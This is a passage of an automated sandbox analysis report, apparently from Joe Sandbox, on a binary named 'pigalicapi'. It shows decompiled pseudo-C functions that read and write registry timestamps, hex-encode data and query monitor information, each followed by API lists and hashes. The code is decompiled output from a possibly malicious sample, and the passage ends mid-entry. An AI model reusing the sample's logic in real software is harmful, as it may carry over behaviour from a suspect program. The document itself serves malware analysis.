                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v72;
                                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                                                                                          				short* _t69;
                                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 1;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v24 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                                          					_t58 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          					_v12 = _t58;
                                                                                                                                                                                                                                                                                          					E04007D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                                          					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                                          					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                                          					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                                          					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                                          						_v48 = 0x10;
                                                                                                                                                                                                                                                                                          						_v44 = 0x10;
                                                                                                                                                                                                                                                                                          						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                                          							_v72 =  &_v64;
                                                                                                                                                                                                                                                                                          							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                                          							_t91 = _v72;
                                                                                                                                                                                                                                                                                          							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                                          							_t68 = _t101;
                                                                                                                                                                                                                                                                                          							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                                          							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                                          							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                                          							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                                          							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                                          							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                                          							_t70 = E04009910();
                                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                                          							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                                          							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                                          								_v5 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                                                          0x04007256
                                                                                                                                                                                                                                                                                          0x0400725e
                                                                                                                                                                                                                                                                                          0x040073af
                                                                                                                                                                                                                                                                                          0x040073b5
                                                                                                                                                                                                                                                                                          0x04007285
                                                                                                                                                                                                                                                                                          0x04007295
                                                                                                                                                                                                                                                                                          0x04007298
                                                                                                                                                                                                                                                                                          0x0400729d
                                                                                                                                                                                                                                                                                          0x040072a8
                                                                                                                                                                                                                                                                                          0x040072bd
                                                                                                                                                                                                                                                                                          0x040072c3
                                                                                                                                                                                                                                                                                          0x040072c6
                                                                                                                                                                                                                                                                                          0x040072d6
                                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                                          0x040072df
                                                                                                                                                                                                                                                                                          0x04007301
                                                                                                                                                                                                                                                                                          0x04007307
                                                                                                                                                                                                                                                                                          0x0400730e
                                                                                                                                                                                                                                                                                          0x04007331
                                                                                                                                                                                                                                                                                          0x0400733c
                                                                                                                                                                                                                                                                                          0x04007343
                                                                                                                                                                                                                                                                                          0x04007349
                                                                                                                                                                                                                                                                                          0x0400734c
                                                                                                                                                                                                                                                                                          0x0400734f
                                                                                                                                                                                                                                                                                          0x04007353
                                                                                                                                                                                                                                                                                          0x04007358
                                                                                                                                                                                                                                                                                          0x0400735e
                                                                                                                                                                                                                                                                                          0x04007364
                                                                                                                                                                                                                                                                                          0x0400736a
                                                                                                                                                                                                                                                                                          0x0400736f
                                                                                                                                                                                                                                                                                          0x04007374
                                                                                                                                                                                                                                                                                          0x0400737a
                                                                                                                                                                                                                                                                                          0x04007380
                                                                                                                                                                                                                                                                                          0x04007383
                                                                                                                                                                                                                                                                                          0x0400738b
                                                                                                                                                                                                                                                                                          0x04007393
                                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007301

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040072BD
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 040072F9
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 04007329
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007343
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 040073A9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                                          • Opcode ID: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                                          • Instruction ID: 1589668eb117d9c12aae7036857c9bc1fd79cd220dc98d09134ced9bc9b72130
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE414C74900208EFEB08DF94D885BEDBBB5FF48300F14C569E915AB281D779AA45CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040073C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                          					_t24 = _a4;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                                          						_t26 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          						_v8 = _t26;
                                                                                                                                                                                                                                                                                          						E04007D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                                          						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                                          						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          						if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                                          						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                                          						if(_t24 == 0) {
                                                                                                                                                                                                                                                                                          							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                                          							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                                          							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                                          0x040073ca
                                                                                                                                                                                                                                                                                          0x040073e4
                                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                                          0x04007401
                                                                                                                                                                                                                                                                                          0x04007404
                                                                                                                                                                                                                                                                                          0x04007409
                                                                                                                                                                                                                                                                                          0x04007414
                                                                                                                                                                                                                                                                                          0x04007429
                                                                                                                                                                                                                                                                                          0x04007432
                                                                                                                                                                                                                                                                                          0x04007442
                                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                                          0x0400744b
                                                                                                                                                                                                                                                                                          0x04007465
                                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                                          0x04007473
                                                                                                                                                                                                                                                                                          0x0400748b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007495
                                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                                          0x0400749e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 04007429
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 04007465
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007473
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400748B
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007495
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                                          • Instruction ID: 829c9f2afe597629132b3bb77bbcf1684e2940429f06bc569247a29e29dd4590
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 442112B5900208ABEB14DFA4D849FFE77B8FB48704F048558FA15AB180D77DAA44CB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04009650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				signed char _v25;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                          					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                                          						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                                          						E04007D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                                          						E04009560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                                          						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                                          						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                                          						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                                          						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x04009656
                                                                                                                                                                                                                                                                                          0x04009661
                                                                                                                                                                                                                                                                                          0x04009685
                                                                                                                                                                                                                                                                                          0x04009696
                                                                                                                                                                                                                                                                                          0x04009699
                                                                                                                                                                                                                                                                                          0x040096b1
                                                                                                                                                                                                                                                                                          0x040096bc
                                                                                                                                                                                                                                                                                          0x040096cf
                                                                                                                                                                                                                                                                                          0x040096d4
                                                                                                                                                                                                                                                                                          0x040096df
                                                                                                                                                                                                                                                                                          0x040096ef
                                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                                          0x0400970a
                                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                                          0x04009728

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009690
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 040096DF
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 040096E9
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009701
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009719
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                                          • Instruction ID: 5d62f8ff5c671b513c9f4ed5768570a6b0eac4432c67e9f412687076ede29f23
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D213DB1900349EFEB14CFA4D884BEE7BB5FF44305F148558E914A7281D378AA94CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                                                                                          			E00816BC3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                                                                                                          				LONG* _t21;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				LONG* _t33;
                                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t35 = __eflags;
                                                                                                                                                                                                                                                                                          				_t29 = __edx;
                                                                                                                                                                                                                                                                                          				_t25 = __ebx;
                                                                                                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                                                                                                          				_push(0x8244d0);
                                                                                                                                                                                                                                                                                          				E00818F60(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                          				_t31 = E0081756D(__ebx, __edx, _t35);
                                                                                                                                                                                                                                                                                          				_t15 =  *0x869588; // 0xfffffffe
                                                                                                                                                                                                                                                                                          				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                                                                                                          					E0081A67E(_t25, _t31, 0xd);
                                                                                                                                                                                                                                                                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                                                                                                          					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                                                                                                          					__eflags = _t33 -  *0x869490; // 0x2e21608
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						__eflags = _t33;
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = InterlockedDecrement(_t33);
                                                                                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          								__eflags = _t33 - 0x869068;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									E00815DE2(_t33);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t21 =  *0x869490; // 0x2e21608
                                                                                                                                                                                                                                                                                          						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                                                                                                          						_t33 =  *0x869490; // 0x2e21608
                                                                                                                                                                                                                                                                                          						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                                                                                                          						InterlockedIncrement(_t33);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                          					E00816C5E();
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t38 = _t33;
                                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          					_push(0x20);
                                                                                                                                                                                                                                                                                          					E008186D7(_t29, _t38);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E00818FA5(_t33);
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x00816bc3
                                                                                                                                                                                                                                                                                          0x00816bc3
                                                                                                                                                                                                                                                                                          0x00816bc3
                                                                                                                                                                                                                                                                                          0x00816bc3
                                                                                                                                                                                                                                                                                          0x00816bc5
                                                                                                                                                                                                                                                                                          0x00816bca
                                                                                                                                                                                                                                                                                          0x00816bd4
                                                                                                                                                                                                                                                                                          0x00816bd6
                                                                                                                                                                                                                                                                                          0x00816bde
                                                                                                                                                                                                                                                                                          0x00816bff
                                                                                                                                                                                                                                                                                          0x00816c05
                                                                                                                                                                                                                                                                                          0x00816c09
                                                                                                                                                                                                                                                                                          0x00816c0c
                                                                                                                                                                                                                                                                                          0x00816c0f
                                                                                                                                                                                                                                                                                          0x00816c15
                                                                                                                                                                                                                                                                                          0x00816c17
                                                                                                                                                                                                                                                                                          0x00816c19
                                                                                                                                                                                                                                                                                          0x00816c22
                                                                                                                                                                                                                                                                                          0x00816c24
                                                                                                                                                                                                                                                                                          0x00816c26
                                                                                                                                                                                                                                                                                          0x00816c2c
                                                                                                                                                                                                                                                                                          0x00816c2f
                                                                                                                                                                                                                                                                                          0x00816c34
                                                                                                                                                                                                                                                                                          0x00816c2c
                                                                                                                                                                                                                                                                                          0x00816c24
                                                                                                                                                                                                                                                                                          0x00816c35
                                                                                                                                                                                                                                                                                          0x00816c3a
                                                                                                                                                                                                                                                                                          0x00816c3d
                                                                                                                                                                                                                                                                                          0x00816c43
                                                                                                                                                                                                                                                                                          0x00816c47
                                                                                                                                                                                                                                                                                          0x00816c47
                                                                                                                                                                                                                                                                                          0x00816c4d
                                                                                                                                                                                                                                                                                          0x00816c54
                                                                                                                                                                                                                                                                                          0x00816be6
                                                                                                                                                                                                                                                                                          0x00816be6
                                                                                                                                                                                                                                                                                          0x00816be6
                                                                                                                                                                                                                                                                                          0x00816be9
                                                                                                                                                                                                                                                                                          0x00816beb
                                                                                                                                                                                                                                                                                          0x00816bed
                                                                                                                                                                                                                                                                                          0x00816bef
                                                                                                                                                                                                                                                                                          0x00816bf4
                                                                                                                                                                                                                                                                                          0x00816bfc

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00816BCF
                                                                                                                                                                                                                                                                                            • Part of subcall function 0081756D: __getptd_noexit.LIBCMT ref: 00817570
                                                                                                                                                                                                                                                                                            • Part of subcall function 0081756D: __amsg_exit.LIBCMT ref: 0081757D
                                                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00816BEF
                                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00816BFF
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00816C1C
                                                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(02E21608), ref: 00816C47
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 54ab0c529d24f9b6baa73d98a118fbc13b37b66360feb45927e8792ed8492bb1
                                                                                                                                                                                                                                                                                          • Instruction ID: a342b1e317ba26c28a259817301d7bc0b001f0386c1a5277f1e2f39bf938acf2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54ab0c529d24f9b6baa73d98a118fbc13b37b66360feb45927e8792ed8492bb1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D01C432905615DBCB11AF68980A7DD736CFF04724F154019E4E0E7291EB34A8D1DFD6
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000000), ref: 00811BEB
                                                                                                                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00811BF5
                                                                                                                                                                                                                                                                                          • GetMonitorInfoA.USER32 ref: 00811C24
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$FromPoint$Info
                                                                                                                                                                                                                                                                                          • String ID: (
